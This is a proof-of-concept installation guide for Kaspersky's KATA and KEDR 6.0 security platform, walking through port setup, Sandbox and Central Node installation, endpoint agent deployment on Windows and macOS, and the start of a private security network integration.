KATA & KEDR v.6.

0:
PROOF OF CONCEPT GUIDE

1
TABLE OF CONTENTS
History of changes ..................................................................................................................................................3
Introduction ..........................................................................................................................................................4
Who IS this guide FOR? ................................................................................................................................................... 4
KATA & KEDR ................................................................................................................................................................... 4
KEDR main functionality ......................................................................................................................................5
KATA & KEDR deployment scenarios .............................................................................................................................. 7
1.Environment preparation ...................................................................................................................................9
1.1. Ports and update/KSN servers ............................................................................................................................ 9
1.2. Windows event log events list .......................................................................................................................... 10
1.3. KATA Hardware requirements .......................................................................................................................... 11
1.4. Download the distributives ............................................................................................................................... 11
2. KATA/EDR installation ...................................................................................................................................13
2.1 Sandbox installation .......................................................................................................................................... 13
2.2 Central Node with Sensor installation .............................................................................................................. 23
2.3 STANDALONE Endpoint Agent installation and configuration using KSC Web UI. ............................................ 35
2.4 INSTALLING KES with BUILT-in EDR AGENT On Apple MacOS platform. .......................................................... 44
Conclusion .........................................................................................................................................................51
Appendix A: KPSN integration ...........................................................................................................................52
Appendix B: Kaspersky security for mail gateway (KSMG) integration .............................................................54
Appendix C: Kaspersky web traffic security (KWTS) integration .......................................................................55
Appendix D: KATA/KEDR testing ......................................................................................................................56
Appendix E: Endpoint Agent installation and configuration using KSC MMC UI ...............................................70
Appendix F: Installing Kaspersky Endpoint Agent for Linux ..............................................................................78
Appendix G: Custom VM Creation .....................................................................................................................83

KATA & KEDR 6.0: POC Guide

HISTORY OF CHANGES
Date Description

14.12.2020 Testing scenarios were added

19.05.2022 Updated to reflect changes in KATA\KEDR 4.0

30.12.2022 Updated to reflect changes in KATA\KEDR 4.1

17.03.2023 Updated to reflect changes in KATA\KEDR 5.0

24.05.2023 Updated to reflect changes in KATA\KEDR 5.1

29.12.2023 Updated to reflect changes in KATA\KEDR 6.0

09.02.2024 FTP-links were updated.

KATA & KEDR 6.0: POC Guide

INTRODUCTION
WHO IS THIS GUIDE FOR?
This guide is designed to help you quickly deploy and configure Kaspersky Anti Targeted Attack Platform (KATA)
and Kaspersky Endpoint Detection and Response (KEDR) for evaluation. It guides you through detailed scenarios in
a Proof of Concept environment to help you better understand how KATA/EDR works.
The target audience includes Kaspersky presales engineers and third parties wishing to evaluate KATA.
It is assumed that the reader will:
1. Have prior knowledge of Linux-based OSs.
2. Possess experience as a system administration or technical reviewer.
3. Be familiar, at least at a conceptual level, with Kaspersky products and technologies.

KATA & KEDR

Note: For more detailed information please refer to KATA&KEDR 6.0 Online Help:

https://support.kaspersky.com/KATA/6.0/en-US/246841.htm

KATA functionality
KATA comprises three main components:

• Network Sensor - responsible for collecting and pre-processing mail/web/network traffic. When using NAT,
you’ll need to ensure that traffic is transmitted to the sensor before it is broadcast, to avoid spoofing IP
addresses in the analyzed traffic.
• Central Node - aggregates information from endpoint agents, as well as being responsible for assessing and
classifying threats by their severity level, accumulating an incident database, and providing data visualization
and reporting tools.
• Sandbox - allows you to automatically run and learn about potentially dangerous objects (files and links) in
parallel on isolated virtual machines. To increase system performance, Sandbox can be scaled by combining
multiple instances into a cluster without having to expand an existing license.
The following components are also included in KATA:

• Endpoint Agent – agents that collect information about processes and network activity at the level of
workstations and servers. They’re implemented in two versions: as an independent agent and as an agent
in Kaspersky Endpoint Security for Windows.

• Web console – a tool for monitoring and studying the results of analysis conducted by KATA. The
component is implemented as a web server on the Central Node, to which you can connect using any
popular web browser.

KATA analyzes the following types of information flow:

• Mirrored Network Traffic (SPAN/ RSPAN / ERSPAN / TAP) of a network segment for users with internet
access. Traffic includes information on internet interactions by corporate network hosts. Traffic processing
is performed, as well as the extraction and further analysis of objects (files and links) and metadata for the
HTTP, HTTP2, FTP, SMTP, DNS, SMB, and NFS protocols.
• Data from proxy servers that supports the transfer of objects (files and links) to third-party systems using
the ICAP protocol. Note that if the proxy server can replace SSL certificates then KATA can, for example,
analyze encrypted traffic for the HTTPS protocol.
ICAP integration with feedback can work in two modes:

KATA & KEDR 6.0: POC Guide

 ▪ Standard scan. In standard scan mode, the object is scanned by all supported technologies. While
being scanned by the Sandbox component, the object remains available. If a threat is detected, the
object is blocked.
▪ Advanced scan. In the advanced scan mode, objects are scanned by all supported technologies.
While being scanned by the Sandbox component, the object is not available. If a threat is detected,
the object is blocked.
• Copies of mail messages via POP3 / POP3S / SMTP protocols.
• Mail messages through integration with Kaspersky Linux Mail Server (KLMS)/Kaspersky Security Mail
Gateway (KSMG). Note that if KLMS or KSMG mail gateways are integrated with KATA, unsafe mail messages
and/or their components (links All / attachments) can be blocked prior to delivery to users by applying an
additional level of analysis in KATA Sandbox component.
• Telemetry from critical workstations and servers. Endpoint Agent (included in the Kaspersky Endpoint
Security for Windows application, or can be installed as a separate module) can be installed on workstations
and servers. Endpoint Agent constantly monitors processes, open network connections and mutable files
on the host. After collecting telemetry, Endpoint Agent sends this data to the Central Node for analysis and
correlation with Indicators of Attack (“IoAs” or “hunts”) and the MITRE ATT&CK matrix. IoA rules are created
by Kaspersky experts and delivered with updates. (This component is available with the KEDR license.)
KATA analyzes objects using the following technologies:

• AM - «Anti-malware Engine» - used in the Central Node.

• Sandbox – a virtual execution environment «Advanced Sandbox», which detects suspicious and malicious
activity in objects (emails, documents, executable files, etc.) based on the analysis of their behavior in a
virtual environment: version 5.1 has the following options:
▪ Windows 7, Windows 10.
▪ CentOS 7.8, Windows 7, Windows 10.
▪ Astra Linux 1.7, Windows 7, Windows 10.
▪ Custom
• Intrusion Detection System - used with a set of unique rules, which are created by Kaspersky experts based
on analysis of the malware and APT module’s network communications.
• YARA Engine - analyzes file content based on the user’s custom logic.
• URL Reputation – a technology containing records on malicious and phishing hosts, C2-servers, APT-related
hosts, etc.
• Mobile Attack Analyzer - a cloud-based technology which can analyze APK-files. As a result, the user
recieves an AM detect.

KEDR MAIN FUNCTIONALITY

Data collection in telemetry from hosts:

• The agent for Windows collects and sends the following list of events to the Central Node:
o Process started
o Module loaded
o Connection to remote host
o Prevention rule
o Document blocked
o File changed
o System event log
o Registry modified
o Port listened
o Driver loaded
o Process: interpreted file run

KATA & KEDR 6.0: POC Guide

 o Process: console interactive input
• The Agent for Linux collects and sends the following list of events to the Central Node:
o File modified.
o Process started.
o System event log.
o Scan: detect.
o Scan: detect processing result.
• A Threat Hunting page is created in the web console, allowing the security officer to search through
collected telemetry.
Detection, through:

• IoA alerts
• Scheduled IoC host scanning
Automated Prevention:

• Software launch blocking

• Script launch blocking
• Documents launch blocking
• New rule can be created from an alert page or ‘Threat Hunting’ event, or taken from the list of prevention
rules
Response features:

• The following actions are implemented actively on the agent for Windows:
o Get data:
• Forensics;
• NTFS metafiles;
• Registry key;
• Process memory dump;
• Memory dump;
• Disk image;
• File;
o Kill Process
o Start YARA scan
o Run program - run a program or cmd command.
o Delete File
o Quarantine File/Restore File
o Service management
o Host Isolation
• The following actions are implemented actively on the agent for Linux:
o Get file
o Run program
o Delete file
o Kill Process
o Isolate host
• By default, files collected and quarantined files are analyzed on the Central Node using the following
technologies: Anti-Malware Engine, YARA, Sandbox.

KATA & KEDR 6.0: POC Guide

KATA & KEDR DEPLOYMENT SCENARIOS
1. Standard deployment:

Figure 1: standard configuration of KATA/EDR

KATA & KEDR 6.0: POC Guide

 2. KATA/KEDR with Standalone Sensor deployment scenario:

Files extracted from traffic

‘IDS’ and ‘URL Reputation’ detects

EDR telemetry

Figure 2: KATA/EDR two-server deployment

KATA & KEDR 6.0: POC Guide

1.ENVIRONMENT PREPARATION
1.1. PORTS AND UPDATE/KSN SERVERS
Open the following ports:
Source Destination Port Protocol

22 TCP
(server connection via SSH)
443
(receiving data from KEA and
TCP
Kaspersky gateways (KSMG,
KWTS)
8443 TCP
(Web UI)
Inbound
53
(communication with the
UDP
server with the Sensor
component)
9081
Central Node (receiving data from Sensor
TCP
components installed on
standalone servers)
80, 443, 1443
(communication with KSN and TCP
Kaspersky Update servers)

Outbound 443
(communication with sandbox TCP
component)
601 TCP
(syslog via TCP)
22 TCP
(server connection via SSH)
1344
(ICAP server, for proxy server TCP
integration)
25
(SMTP server, for mail server TCP
Inbound integration)
443
(port for proxying telemetry TCP
from KEA to CN)
53
(communication with the
UDP
server with the Central Node
Sensor component)
80, 443
(communication with KSN and TCP
Kaspersky Update servers)
995/110 TCP
(POP3s/POP3 integration)

Outbound 9081
(forwarding traffic to the TCP
server with the Central Node
component)
53
(communication with the UDP
server with the Central Node)
22 TCP
Inbound (server connection via SSH)
Sandbox (management interface)
443 TCP

KATA & KEDR 6.0: POC Guide

 (receiving objects to scan from
CN)
8443 TCP
(Web UI)

Outbound 80, 443

(communication with KSN and TCP
(management interface)
Kaspersky Update servers)
Internet access
Outbound (side channel without access
(malware interface) to corporate network
infrastructure)

Note: If you are deploying the Central Node and Sensor servers in separate subnets separated by other network
devices such as firewalls, make sure that in addition to the ports listed above, IP protocols with ID 50 and ID 51 are
allowed between the Sensor and the Central Node (required for IPSEC connection between Sensor and Central
Node).
Note: If you install a second network interface that receives only mirrored traffic in a VMware ESXi virtual
environment, use the E1000 network adapter or disable the LRO (large receive offload) option on a VMXNET3
network adapter.

Update and KSN servers:

Server FQDN

http://antiapt.kaspersky-labs.com
http://antiaptcdn.kaspersky-labs.com

Updates

https://ksn-crypto-file-geo.kaspersky-labs.com
https://ksn-crypto-stat-geo.kaspersky-labs.com
https://ksn-crypto-url-geo.kaspersky-labs.com
https://ksn-crypto-verdict-geo.kaspersky-labs.com
KSN https://ksn-crypto-kas-geo.kaspersky-labs.com
https://ksn-crypto-a-stat-geo.kaspersky-labs.com
https://ksn-crypto-hash-geo.kaspersky-labs.com
https://ksn-his-geo.kaspersky-labs.com

1.2. WINDOWS EVENT LOG EVENTS LIST

The EDR agent is able to process a number of windows event log events. In order to parse windows event log
events, their audit must be enabled. A short list of supported event IDs can be found in Threat Hunting builder:

KATA & KEDR 6.0: POC Guide

 1.3. KATA HARDWARE REQUIREMENTS
Review KATA’s requirements to make sure that the PoC environment meets them all. The requirements are given in
this sizing guide:
Make sure that the servers are within the local network in accordance with the deployment
scenario.
Documentation is available at: https://support.kaspersky.com/KATA/6.0/en-US/246841.htm

If EDR agents are used, make sure that the EDR agents are compatible with the OS:
• Windows:
a. https://support.kaspersky.com/KEA/3.16/en-US/193103.htm
b. https://support.kaspersky.com/help/KESWin/12.3/en-US/127972.htm
• Linux: https://support.kaspersky.com/KES4Linux/11.4.0/en-US/245117.htm
• MacOS: https://support.kaspersky.com/kes-for-mac/12.0/118665

Minimum hardware requirements:

Component Hardware Requirements

Central Node 6 vCPU, 26 GB RAM, 1 TB RAID10 + 1 TB RAID10

Sensor 4 vCPU, 16 GB RAM, 300 GB RAID1

Sandbox (Virtual) 32 vCPU, 32 GB RAM, 300 GB RAID1

1.4. DOWNLOAD THE DISTRIBUTIVES

Distributives and documentation: https://confluence.kaspersky.com/pages/viewpage.action?pageId=1344846696

KATA & KEDR 6.0: POC Guide

KATA & KEDR 6.0: POC Guide
2. KATA/EDR INSTALLATION
Procedure for installing program components

Perform the program installation steps in the following sequence:

1. Install the Sandbox component.
2. Add the VM images to the Sandbox component.
3. Install the Central Node and Sensor components according to the program deployment and installation
scenario.
4. Install the Kaspersky Endpoint Agents on computers that belong to the corporate IT infrastructure.

If you’re using the standard deployment scenario, install the Central Node with the embedded Sensor on one
server and Sandbox on another one.

If you are using the deployment scenario with a standalone Sensor component, install the solution components in
the following order:
1. Install the Central Node component on the first server.
2. Install the Sensor component on the second server or on several servers.
3. Install the Kaspersky Endpoint Agents on computers that belong to the corporate IT infrastructure.

2.1 SANDBOX INSTALLATION

First of all, check the prerequisites https://support.kaspersky.com/help/KATA/6.0/en-US/247180.htm.
On the virtual machine:
1. Nested virtualization enabled! (a common mistake).
2. Latency Sensitivity option set to High.
3. Entire RAM is reserved.
4. Entire CPU frequency is reserved.
To enable nested virtualization in the VMWare vSphere, see here: https://docs.vmware.com/en/VMware-
vSphere/7.0/com.vmware.vsphere.vm_admin.doc/GUID-2A98801C-68E8-47AF-99ED-00C63E4857F6.html

In addition, it is strongly recommended to use a dedicated Internet(malware) interface.

2.1.1. Click Ok to start the Sandbox.

KATA & KEDR 6.0: POC Guide

 2.1.2. Select the license agreement language.

2.1.3. Accept both license agreements by

clicking on I accept .

2.1.4. Select the disk drive for system

installation.

2.1.5. Confirm installation on the selected drive

by clicking Install….

KATA & KEDR 6.0: POC Guide

 2.1.6. Wait until the necessary files are
unpacked

2.1.7. Set the host name, then click Ok.

2.1.8. Select the management interface, then

click <Enter>.

2.1.9. Set the ip address and mask of the

management interface, then click Ok.

KATA & KEDR 6.0: POC Guide

 2.1.10. Select New to add a DNS server, then
click <Enter>

2.1.11. Specify the DNS server, then click Ok.

2.1.12. Select Go back to continue.

2.1.13. Select New in order to add a route.

KATA & KEDR 6.0: POC Guide

 2.1.14. Add route details.
Note: this route is for the management
interface

2.1.15. Select Continue to proceed with

installation.

2.1.16. Enter your preferred minimum

password length, then click Ok.

2.1.17. Enter your administration account

details, then click Ok.

KATA & KEDR 6.0: POC Guide

 2.1.18. Press <Enter>

2.1.19. Press <Enter> to continue and continue

tuning KATA Sandbox in the web UI.

2.1.20. Connect to the Sandbox web interface,

example: https://10.10.20.151:8443. Use
credentials which were set in step 2.1.17

Creating virtual machines with preset images of operating systems from the distribution kit

2.1.21. Go to the Templates&Storage->

Templates tab. Click on Add and chose
Import template.

KATA & KEDR 6.0: POC Guide

 2.1.22. Select the appropriate image from the
distribution kit and click Open.

2.1.23. Wait until uploading is completed. To

upload the others, repeat this step to
upload them.
Note 1: Read additional important
information about Selecting operating
systems:
https://support.kaspersky.com/help/K
ATA/6.0/en-US/246744.htm
Note 2: If the network connection
between endpoints that’s used to
connect the web interface and the
Sandbox is poor, timeouts and
transport errors may be observed
during image upload. If this is an issue,
use the method described in 2.1.28-
2.1.35 for upload, then create VMs by
following step 2.1.24.

2.1.24. Chose wa particular template (by

clicking on it).
Click Create VM to create the particular
VMs for the sample analysis. – grab a
coffee, the process will take some time.

KATA & KEDR 6.0: POC Guide

 2.1.25. For Windows OS images, click Accept
to accept the EULA.

2.1.26. Repeat steps 2.1.21-2.1.25 for other

images. After the VMs finish unpacking,
go to Virtual machines section. install
them by clicking Install ready VMs.

2.1.27. Set the maximum number of guest VMs.

(When installing the Sandbox
component on a VMware ESXi virtual
machine, you must set the limit for
simultaneously running virtual machines
to 12 (change the value from 48 to 12).
See details
https://support.kaspersky.com/help/KA
TA/6.0/en-US/247180.htm ).
After all required VMs are installed, jump
to step 2.1.36.

KATA & KEDR 6.0: POC Guide

 2.1.28. For cases with a poor network
connection you may use SFTP to
upload VM images to the platform
Note: SFTP is disabled by default. To
enable it, connect to Sandbox via SSH
(e.g. via PuTTY) and enter <Technical
Support Mode>.

2.1.29. Switch to root user by command

sudo -i
(use the same password as for SSH).

2.1.30. Execute
vi /etc/ssh/sshd_config

2.1.31. Type
:?Force
and click <Enter>.

KATA & KEDR 6.0: POC Guide

 2.1.32. You need to comment out the line
ForceCommand /usr/bin/apt-
restricted-ssh.

Click on <Esc> then click on the <I>

button.

2.1.33. Put # before ForceCommand line

then click on <Esc>
then write :wq
Click on <enter>.

2.1.34. Restart the SSH service:

systemctl restart sshd

2.1.35. Connect to Sandbox with the scp client

and upload all images to
/var/opt/kaspersky/apt/files

KATA & KEDR 6.0: POC Guide

 2.1.36. Set the date and time in the Date and
Time tab.
Note: If possible specify NTP server.

2.1.37. Open the Network Interfaces tab, set

Host name, DNS settings, and
Management and Internet (malware)
interface settings.
Note: The malware interface strongly
recommended. If you don’t have one
for current PoC just enter some fake
network settings (e.g: ip: 1.1.1.2, mask
255.255.255.0, gateway: 1.1.1.1)
2.1.38. Set Static Routes if needed

2.1.39. Wait for a couple of seconds for the

system pop-up to reboot the Sandbox
in order to apply these settings.

2.2 CENTRAL NODE WITH SENSOR INSTALLATION

2.2.1. Select a language, choose <OK> and

press <Enter>.

KATA & KEDR 6.0: POC Guide

 2.2.2. Select <I accept>, then select <OK> and
press <Enter> to accept the license
agreement.

2.2.3. Select <I accept>, then select <OK> and

press <Enter> to accept the privacy
policy.

2.2.4. Select <single>, then select <OK> and

press <Enter> to continue.

2.2.5. Select <OK> and press <Enter> to

continue.

2.2.6. Select <yes> and press <Enter> to

continue.

KATA & KEDR 6.0: POC Guide

 2.2.7. Leave the default settings (198.18.0.0/16)
and press <Enter>.

2.2.8. Leave the default settings (198.19.0.0/16)

and press <Enter>.
The installation continues

2.2.9. Choose the external Interface and press

<Enter>.

KATA & KEDR 6.0: POC Guide

 2.2.10. Change the type of the interface to
Static.

2.2.11. Specify IP configuration, choose Save

and press <Enter>.

2.2.12.Specify minimum password length, then

choose Ok and press <Enter>.

KATA & KEDR 6.0: POC Guide

 2.2.13. Enter admin (CLI and Web UI) account
details, then choose Ok and press
<Enter>.

2.2.14. Specify the IP address of a DNS server,

then press <Enter> twice.

2.2.15. Enable traffic capturing capabilities (if

applicable): type <y> then press <Enter>.
Otherwise type <n> then press <Enter>.

2.2.16.Specify NTP server, then press <Enter>

twice

2.2.17. You will see the CLI Login Page.

KATA & KEDR 6.0: POC Guide

 2.2.18. Go to the KATA Central Node web
interface, for example:
https://10.10.20.199:8443.
First of all, you must specify the sizing
settings.

Tick the Local administrator option,

enter the administrator user name
"admin" and the password that was
specified during step 2.2.13.

2.2.19.Now you see the Server configuration

page.

2.2.20. Specify your parameters then click

Configure.

KATA & KEDR 6.0: POC Guide

 2.2.21.Click Start.

2.2.22. Wait until the server configuration is

completed.

2.2.23. After the configuration is complete

you will be prompted to log in. Log in as
the default regular Administrator.
Enter the administrator user name
Administrator and the default password
Administrator, then click Log in.

2.2.24. Now you see the Administrator’s

console.

KATA & KEDR 6.0: POC Guide

 The next steps describe connecting the CN to the Sandbox

2.2.25. Go to Sandbox servers then click Add.

2.2.26. Specify the IP address of the Sandbox

component. Click Get certificate
fingerprint.

2.2.27. The workspace displays the fingerprint

of the certificate of the server with the
Sandbox component.

2.2.28. Compare the obtained certificate

fingerprint with the fingerprint indicated
in the Sandbox web interface in the
KATA Authorization section in the
Certificate fingerprint field. If the
certificate fingerprints match, perform
the next steps of the instructions. For
security reasons, if the certificate
fingerprints do not match, confirming the
connection is not recommended. Make
sure the data you entered is correct.

2.2.29. Go back to the web interface of the

Central Node.
In the Name field, specify the Sandbox
component name that will be displayed in
the web interface of the Central Node
component. Select the Enable check
box.
Click Add.

KATA & KEDR 6.0: POC Guide

 2.2.30. Make sure the authorization status is
Request sent

2.2.31.Select the Setting section in the web

interface of the Central Node. Next
select the Certificates section. Pay
attention to the certificate fingerprint of
the Central Node.

2.2.32. Go back to the KATA Authorization

page of the Sandbox web interface.
Refresh the page. Compare the
certificate fingerprint of the Central
Node with the fingerprint indicated in the
Sandbox web interface. If the certificate
fingerprints match, click Accept. For
security reasons, if the certificate
fingerprints do not match, accepting the
connection is not recommended.

2.2.33. Click Yes to save changes.

2.2.34. Go back to the web interface of the

Central Node.
Check the state of the authorization (it
must be Approved) and make sure the
Sandbox is enabled.

KATA & KEDR 6.0: POC Guide

 2.2.35. Go to the Settings tab.
Under OS set, select one of the options,
then click Apply.
Note: remember, on Sandbox’s side all
types of the VMs should already be
installed. See additional information here:
https://support.kaspersky.com/help/KA
TA/6.0/en-US/246744.htm

The next steps describe the installation of license keys

2.2.36. In the web interface of the Central

Node go to Settings->License. Click
Import in the KATA or KEDR section
(depending on your needs).

2.2.37. Choose an appropriate license key.

KATA & KEDR 6.0: POC Guide

 2.2.38. Read the KSN statement. Choose I
agree to participate in KSN and click
Apply.

2.2.39. If applicable, repeat steps 2.2.36-

2.2.38 to download a license key.
Have a look at the example of keys
installing in the picture.

Optional. Configuring the receipt of mirrored traffic from SPAN ports

2.2.40. In the web interface of the Central

Node go to Sensor servers section.
The Server list table will be displayed.
Select the Sensor component.

2.2.41. Select the SPAN traffic processing

section.
The Network interfaces table is
displayed.

KATA & KEDR 6.0: POC Guide

 2.2.42. In the row of the network interface
from which you want to configure the
receipt of mirrored traffic, set the toggle
switch in the SPAN traffic scanning
column to Enabled.
In the Capture thread drop-down list,
select the stream that will process this
network interface.
In the Select CPU drop-down list, select
the processor that will process the
network traffic.
Click Apply.
The receipt of mirrored traffic from
SPAN ports will be configured.
Note: If you use virtual machines, make
sure the virtual machine with KATA and
the virtual machine with workstation are
running on the same hypervisor host.

KATA & KEDR 6.0: POC Guide

 2.3 STANDALONE ENDPOINT AGENT INSTALLATION AND
CONFIGURATION USING KSC WEB UI.
Installation and configuration can be done from KSC or locally (CLI or cmd)
https://support.kaspersky.com/help/KEA/3.16/en-US/199051.htm

Note: The following steps describe the installation on Windows machines.

2.3.1. The first step is to upload the KEDR

license to the KSC:
Login to KSC Web Console
Go to Operations ->Licensing->
Kaspersky licenses and click Add.
Then choose Add key file, select license
key file and check Automatically
distribute license key to managed
devices. Save the license.

2.3.2. Install the Kaspersky Endpoint Agent

Management web plug-in on the KSC
Web Console. See the detailed
instructions here:
https://support.kaspersky.com/help/MD
R/KEALinux/en-US/200778.htm

2.3.3. Download the Kaspersky Endpoint Agent

2.3.4. Login to the Central Node as an

Administrator
Go to the Settings ->Certificates and
download the Server Certificate by
clicking Export (the kata.crt file will be
downloaded).
Optionally: For additional host-based
security, enable Validate Endpoint Agent
TLS certificates and generate the
Endpoint Agent certificate (ATTENTION!
The agent_cert_xxxx.pfx file will be
downloaded automatically).

KATA & KEDR 6.0: POC Guide

 2.3.5. Go to the KSC Web console
Create the KEA installation package:
Deployment & Assignment -> Installation
Packaged ->+ Add.

2.3.6. Select Create an installation package

from a file then Click Next.
Set a name for this installation package.
Click Browse, select downloaded zip
archive from klbox and click Open.
Then click Next.

2.3.7. To accept the EULA and privacy terms

scroll down to the bottom, then tick I
accept Private policy and accept EULA.
Then click Next -> OK

2.3.8. The next step is to install KEA:

Go to Devices -> Tasks -> Add.

KATA & KEDR 6.0: POC Guide

 2.3.9. Set New task properties:
o Application: Kaspersky Security
Center 14
o Task type: Install application remotely
o Task name: Your choice
Assign the task according to the
deployment scenario accepted on PoC
and click Next.
Note: in this guide we will use manual
selection of hosts to install KEA

2.3.10. Choose devices to install KEA, click

Add, tick selected devices, then click
Next.

KATA & KEDR 6.0: POC Guide

 2.3.11. Choose the installation package and
the Network Agent.
Check Using Network Agent Click Next.
Answer the questions, select user
accounts to access systems.
Click Finish to complete creating the
task.

KATA & KEDR 6.0: POC Guide

 2.3.12. Go to Devices->Tasks. Choose created
task, then click Start.

2.3.13. Wait until the task has successfully

completed.

2.3.14. The next step is to create your policy.

Go to Devices -> Policies&Profiles
<Add>
in the New Policy Wizard select
<Kaspersky Endpoint Agent>.
Click on <Next> and then <Next> again
on the following screen.

KATA & KEDR 6.0: POC Guide

 2.3.15. Check the KATA EDR option and click
Next.

2.3.16. On next step set the policy status to

Active and switch to the Application
settings tab to configure the
connection settings between KEA and
the KATA Central node

2.3.17. To setup connection to the KATA

Central Node on the Application
settings tab go to: Telemetry collection
servers -> KATA integration.
Tick the Enable KATA integration option.
Tick Use pinned certificate to secure
connection option.
Click Add New TLS Certificate.
Click Upload, choose kata.crt file
downloaded at step 2.3.4, click Open
then click OK.

Add the Central Node connection

address and port (TCP port 443 is
default).
Optionally. To prevent potential MitM
attacks check <Use pinned certificate
KATA & KEDR 6.0: POC Guide
 to secure connection> and add
<kata.crt> downloaded at step 2.3.4.

2.3.18. In the List of KATA servers section click

Add.

2.3.19. In the Server address field specify IP

address of the KATA Central Node then
click OK

2.3.20. Optional, but strongly recommended.

In the Advanced connection security
section check Secure connection with
client certificate and upload the client
certificate which you downloaded at
step 2.3.4
You will see the Client certificate
successfully upload status.

KATA & KEDR 6.0: POC Guide

 2.3.21. Change any additional KATA integration
setting if needed and save the changes
by clicking OK

2.3.22. Change any additional application

settings if needed and save the
changes.
Optional, but recommended: Set
password protection in the security
settings.

KATA & KEDR 6.0: POC Guide

 2.3.23. Open the Central Node web console as
an Administrator and check that the
Endpoint Agents appear correctly
there.

KATA & KEDR 6.0: POC Guide

 2.4 INSTALLING KES WITH BUILT-IN EDR AGENT ON APPLE MACOS
PLATFORM.
In order to deploy EDR solution on MacOS follow the steps below:

1) Kaspersky Network agent for Mac installation.

2) Preparation of EDR only Kaspersky Endpoint Security 12 for Mac installation package.
(In case if fully fledged EPP is required default package can be used available on public protection
download web site)

3) Deployment task creation.

4) Solution policy creation and installation.
Network Agent and KES for Mac installation steps:

Kaspersky Network Agent and KES for Mac can be deployed with several ways:

a) Locally by using the distribution kit downloaded from the Kaspersky website.

b) Remotely by using Apple Remote Desktop.

c) Remotely via KSC.

Note: To simplify things, the following steps describe local installation of Network Agent and remote installation
task in KSC to deploy KES for MacOS.

1. Download the Network Agent installation package on

a target Mac device from
https://www.kaspersky.com/small-to-medium-
business-security/downloads/endpoint

2. In the appeared message box, click Allow.

KATA & KEDR 6.0: POC Guide

3. On the Welcome to the Network Agent Installer
screen click Continue.

4. On the Software License Agreement screen click

Continue.

5. Agree to the terms of the software license

agreement.

6. Specify the address of Kaspersky Security Center

Administration Server.

KATA & KEDR 6.0: POC Guide

7. Click Install and enter the administrator’s
password.

8. Close the Wizard and move the Network Agent

installer to the Bin if necessary.

Network Agent for Mac is successfully installed. Now you can manage Kaspersky applications on this device using
Kaspersky Security Center. Let’s proceed with the Kaspersky Endpoint Security for MacOS remote installation.

Note: Before installing Kaspersky Endpoint Security remotely, we recommend that you download the
KES_for_macOS11_and_later.zip archive from Kaspersky Technical Support website and apply the
KES_for_macOS11_and_later_profile.mobileconfig configuration profile on the client computer using Apple Remote
Management tools. This will allow Kaspersky Endpoint Security to get the following: permissions to install the kernel
extension and the system extension, full disk access, and permissions to configure network connections. To learn
more about the configuration profile and other options, visit the Technical Support website.

For evaluation purposes we will allow the required permissions manually on a target device.

9. Switch to the Kaspersky Security Center Web

Console.

Go to DISCOVERY & DEPLOYMENT –

UNASSIGNED DEVICES.

In the right pane select the target Mac device with

Network Agent and click Move to group.

Select a destination group and click Move.

KATA & KEDR 6.0: POC Guide

10. To activate minimum EPP features of
deployed solution go to Discovery &
Deployment -> Deployment & Assignment
-> Installation packages

Click on +Add button -> Create an installation

package for a Kaspersky application.

Locate required KES 12 packaged and

download it

11. From the list of downloaded installation

packages check the one you’ve downloaded
and open it’s settings to select only Endpoint
Detection and Response feature

12. Go to DEVICES – TASKS

Then click +Add.

KATA & KEDR 6.0: POC Guide

13. In the task parameters select and specify the
following:

Application: Kaspersky Security Center 14.2

Task Type: Install application remotely
Task name: Install KES for Mac

Select devices to which the task will be

assigned: Specify device addresses manually
or import addresses from a list.

14. Select devices where Network Agent for Mac

has been installed.

15. On this page specify the following:

Select installation package: Kaspersky

Endpoint Security for Mac 12.0.0

Leave all other settings as default.

KATA & KEDR 6.0: POC Guide

16. Select Do not restart the device.

17. Select No account required (Network Agent

installed).

18. Close the Wizard.

19. Select the created task and click Start.

20. Wait for a few minutes.

Select the task created and click Result.

Check that the task has completed.

To finish the Kaspersky Endpoint Security for

Mac installation process it is necessary to
allow the required permissions on the target
MacOS device.

KATA & KEDR 6.0: POC Guide

After KES with EDR functionality is installed follow standard procedures to grand system permissions for it and
activate a license.

Now, it is time to create and install EDR policy on the managed MacOS devices.

21. Select the administration group that

contains the required client computer.
In the workspace, select the Policies tab
and click New policy.
The New policy wizard opens.

In the Select the application for which

you want to create a group
policy window, in the list of applications,
select Kaspersky Endpoint Security
for Mac (12.0).
22. Go to the application settings-
>Detections and Response -> Endpoint
Detection and Response
(KATA) window, do the following:
• Enable Endpoint Detection and
Response (KATA).
• Configure server connection
settings and add a TLS certificate.
• Add a KATA server address.

Save and install policy.

23. Go to the KATA Central Node Web UI.

Wait until EDR agent connected to the

Central Node.

KATA & KEDR 6.0: POC Guide

CONCLUSION
This concludes your installation of KATA/KEDR 6.0 commercial release. You now know how to install KATA.
This simplified guide is intended to enable a quick evaluation of the product features, using a narrow scope of work.
It does not replace the Product Documentation.

KATA & KEDR 6.0: POC Guide

APPENDIX A: KPSN INTEGRATION
KATA can be integrated with Kaspersky Private Security Network (KPSN).
Configuration files are obtained from HQ after configuration.json is provided.
Configuration files (the file names will differ depending on the installation): kc_<some_name>.xml,
kh_<some_name>.xml, klcli_<some_name>.dat
Files used during integration can be downloaded from following link:
https://confluence.kaspersky.com/display/KAT/KPSN+integration
To integrate KATA and KPSN, follow these steps:

1. Place squeeze.exe, kc_<some_name>.xml and

kh_<some_name>.xml in the same folder.

2. Run cmd as administrator

3. Execute the following command: squeeze.exe

kc_<some_name>.xml kc_private.xms

4. Execute the following command: squeeze.exe

kh_<some_name>.xml kh_private.xms

